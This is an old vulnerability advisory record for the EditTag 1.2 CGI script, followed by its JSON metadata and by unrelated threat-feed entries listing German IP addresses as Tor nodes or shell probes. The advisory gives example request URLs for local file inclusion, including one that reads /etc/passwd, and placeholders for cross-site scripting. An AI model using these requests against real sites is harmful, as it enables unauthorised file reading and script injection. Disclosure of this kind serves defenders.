ID SECURITYVULNS:DOC:15602
Type securityvulns
Reporter Securityvulns
Modified 2007-01-06T00:00:00
Description
Script: EditTag
Version: 1.2
Author: Greg Billock (dmacewen@isn.net)
Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir)
I am sorry for my BAD English.
Description:
1) Local file injection:
An attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files (ex. /etc/passwd)
http://www.victim/edittag/edittag.cgi?file=INJECT
http://www.victim/edittag/edittag.pl?file=INJECT
http://www.victim/edittag/edittag_mp.cgi?file=INJECT
http://www.victim/edittag/edittag_mp.pl?file=INJECT
ex. http://www.victim/edittag/edittag_mp.pl?file=/etc/passwd
2)XSS
http://www.victim/edittag/mkpw_mp.cgi?plain=XSS
http://www.victim/edittag/mkpw.pl?plain=XSS
http://www.victim/edittag/mkpw.cgi?plain=XSS
{"id": "SECURITYVULNS:DOC:15602", "bulletinFamily": "software", "title": "Multiple bugs in EditTag", "description": "Script: EditTag\r\nVersion: 1.2\r\nAuthor: Greg Billock (dmacewen@isn.net)\r\nDiscoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir)\r\n\r\nI am sorry for my BAD English.\r\n\r\nDescription:\r\n\r\n1) Local file injection:\r\nAn attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files (ex. /etc/passwd)\r\n\r\nhttp://www.victim/edittag/edittag.cgi?file=INJECT\r\nhttp://www.victim/edittag/edittag.pl?file=INJECT\r\nhttp://www.victim/edittag/edittag_mp.cgi?file=INJECT\r\nhttp://www.victim/edittag/edittag_mp.pl?file=INJECT\r\n\r\nex. http://www.victim/edittag/edittag_mp.pl?file=/etc/passwd\r\n\r\n2)XSS\r\n\r\nhttp://www.victim/edittag/mkpw_mp.cgi?plain=XSS\r\nhttp://www.victim/edittag/mkpw.pl?plain=XSS\r\nhttp://www.victim/edittag/mkpw.cgi?plain=XSS", "published": "2007-01-06T00:00:00", "modified": "2007-01-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15602", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:20", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 2.9, "vector": "NONE", "modified": "2018-08-31T11:10:20", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB3023167", "KB2880833", "KB2874216", "KB3209587", "KB2788321", "KB981401", "KB955430"]}, {"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_D887B3D9736611EAB81A001CC0382B2F.NASL", "FREEBSD_PKG_090763F6703011EA93DD080027846A02.NASL"]}, {"type": "github", "idList": ["GHSA-GVR4-7XGC-GX3W"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "freebsd", "idList": ["D887B3D9-7366-11EA-B81A-001CC0382B2F"]}, {"type": "zdt", "idList": ["1337DAY-ID-34159", "1337DAY-ID-34153", "1337DAY-ID-34158", "1337DAY-ID-34154", "1337DAY-ID-34157"]}], "modified": "2018-08-31T11:10:20", "rev": 2}, "vulnersScore": 2.9}, "affectedSoftware": []}
{"rst": [{"lastseen": "2020-12-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **89[.]14.221.188** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **53**.\n First seen: 2020-12-26T03:00:00, Last seen: 2020-12-26T03:00:00.\n IOC tags: **tor_node**.\nASN 6805: (First IP 89.12.0.0, Last IP 89.15.255.255).\nASN Name \"TDDEASN1\" and Organisation \"\".\nASN hosts 15602 domains.\nGEO IP information: City \"Berlin\", Country \"Germany\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-26T00:00:00", "id": "RST:CBFB0B9F-784A-39FD-A9CD-6C81AFC42CE2", "href": "", "published": "2020-12-27T00:00:00", "title": "RST Threat feed. IOC: 89.14.221.188", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **95[.]112.11.36** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **53**.\n First seen: 2020-12-26T03:00:00, Last seen: 2020-12-26T03:00:00.\n IOC tags: **tor_node**.\nASN 6805: (First IP 95.112.0.0, Last IP 95.119.255.255).\nASN Name \"TDDEASN1\" and Organisation \"\".\nASN hosts 15602 domains.\nGEO IP information: City \"Hamburg\", Country \"Germany\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-26T00:00:00", "id": "RST:8A245EA6-ED90-3971-A3DF-FEC2C4A656DB", "href": "", "published": "2020-12-27T00:00:00", "title": "RST Threat feed. IOC: 95.112.11.36", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **77[.]8.71.222** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **53**.\n First seen: 2020-12-26T03:00:00, Last seen: 2020-12-26T03:00:00.\n IOC tags: **tor_node**.\nASN 6805: (First IP 77.0.0.0, Last IP 77.15.255.255).\nASN Name \"TDDEASN1\" and Organisation \"\".\nASN hosts 15602 domains.\nGEO IP information: City \"Hamburg\", Country \"Germany\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-26T00:00:00", "id": "RST:DEB51E71-32C6-3FB3-BE86-6D90A904EBF0", "href": "", "published": "2020-12-27T00:00:00", "title": "RST Threat feed. IOC: 77.8.71.222", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **78[.]49.139.89** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **43**.\n First seen: 2020-12-20T03:00:00, Last seen: 2020-12-26T03:00:00.\n IOC tags: **shellprobe**.\nASN 6805: (First IP 78.48.0.0, Last IP 78.55.255.255).\nASN Name \"TDDEASN1\" and Organisation \"\".\nASN hosts 15602 domains.\nGEO IP information: City \"Duisburg\", Country \"Germany\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-20T00:00:00", "id": "RST:D8E667CE-2640-34DF-B781-124BFE29E48B", "href": "", "published": "2020-12-27T00:00:00", "title": "RST Threat feed. IOC: 78.49.139.89", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **78[.]55.119.105** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **53**.\n First seen: 2020-12-26T03:00:00, Last seen: 2020-12-26T03:00:00.\n IOC tags: **tor_node**.\nASN 6805: (First IP 78.48.0.0, Last IP 78.55.255.255).\nASN Name \"TDDEASN1\" and Organisation \"\".\nASN hosts 15602 domains.\nGEO IP information: City \"Berlin\", Country \"Germany\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-26T00:00:00", "id": "RST:6E7BCD87-3070-333A-BE8C-DC90D77BC15F", "href": "", "published": "2020-12-27T00:00:00", "title": "RST Threat feed. IOC: 78.55.119.105", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **95[.]117.156.0** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **43**.\n First seen: 2020-12-20T03:00:00, Last seen: 2020-12-26T03:00:00.\n IOC tags: **shellprobe**.\nASN 6805: (First IP 95.112.0.0, Last IP 95.119.255.255).\nASN Name \"TDDEASN1\" and Organisation \"\".\nASN hosts 15602 domains.\nGEO IP information: City \"Munich\", Country \"Germany\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-20T00:00:00", "id": "RST:F00840A1-D3A3-3DDC-9F41-D58BE514CB12", "href": "", "published": "2020-12-27T00:00:00", "title": "RST Threat feed. IOC: 95.117.156.0", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **95[.]118.161.31** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **53**.\n First seen: 2020-12-26T03:00:00, Last seen: 2020-12-26T03:00:00.\n IOC tags: **tor_node**.\nASN 6805: (First IP 95.112.0.0, Last IP 95.119.255.255).\nASN Name \"TDDEASN1\" and Organisation \"\".\nASN hosts 15602 domains.\nGEO IP information: City \"Oberhaching\", Country \"Germany\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-26T00:00:00", "id": "RST:A134A1C0-DCCC-3BE2-B172-8B68A3E4FE70", "href": "", "published": "2020-12-27T00:00:00", "title": "RST Threat feed. IOC: 95.118.161.31", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **89[.]12.102.56** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **53**.\n First seen: 2020-12-26T03:00:00, Last seen: 2020-12-26T03:00:00.\n IOC tags: **tor_node**.\nASN 6805: (First IP 89.12.0.0, Last IP 89.15.255.255).\nASN Name \"TDDEASN1\" and Organisation \"\".\nASN hosts 15602 domains.\nGEO IP information: City \"Berlin\", Country \"Germany\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-26T00:00:00", "id": "RST:63F251FB-FF9B-36AF-B8EB-3B378B0C3AFA", "href": "", "published": "2020-12-27T00:00:00", "title": "RST Threat feed. IOC: 89.12.102.56", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-27T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **89[.]14.3.70** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **53**.\n First seen: 2020-12-27T03:00:00, Last seen: 2020-12-27T03:00:00.\n IOC tags: **tor_node**.\nASN 6805: (First IP 89.12.0.0, Last IP 89.15.255.255).\nASN Name \"TDDEASN1\" and Organisation \"\".\nASN hosts 15602 domains.\nGEO IP information: City \"Berlin\", Country \"Germany\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-27T00:00:00", "id": "RST:62C3DE50-B27A-3822-A38F-AB8C6E670574", "href": "", "published": "2020-12-27T00:00:00", "title": "RST Threat feed. IOC: 89.14.3.70", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **89[.]14.208.164** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **53**.\n First seen: 2020-12-26T03:00:00, Last seen: 2020-12-26T03:00:00.\n IOC tags: **tor_node**.\nASN 6805: (First IP 89.12.0.0, Last IP 89.15.255.255).\nASN Name \"TDDEASN1\" and Organisation \"\".\nASN hosts 15602 domains.\nGEO IP information: City \"Berlin\", Country \"Germany\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-26T00:00:00", "id": "RST:6AC0D624-46BF-3B23-93A6-208FDAB73CF6", "href": "", "published": "2020-12-27T00:00:00", "title": "RST Threat feed. IOC: 89.14.208.164", "type": "rst", "cvss": {}}]}